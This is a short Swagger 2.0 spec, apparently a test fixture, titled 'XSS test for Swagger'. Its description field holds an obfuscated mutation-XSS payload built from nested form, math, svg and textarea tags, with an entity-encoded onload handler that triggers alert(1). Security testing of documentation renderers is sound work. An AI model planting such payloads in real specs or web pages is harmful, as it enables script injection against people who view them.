swagger: '2.0'
info:
  title: XSS test for Swagger
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;></form>
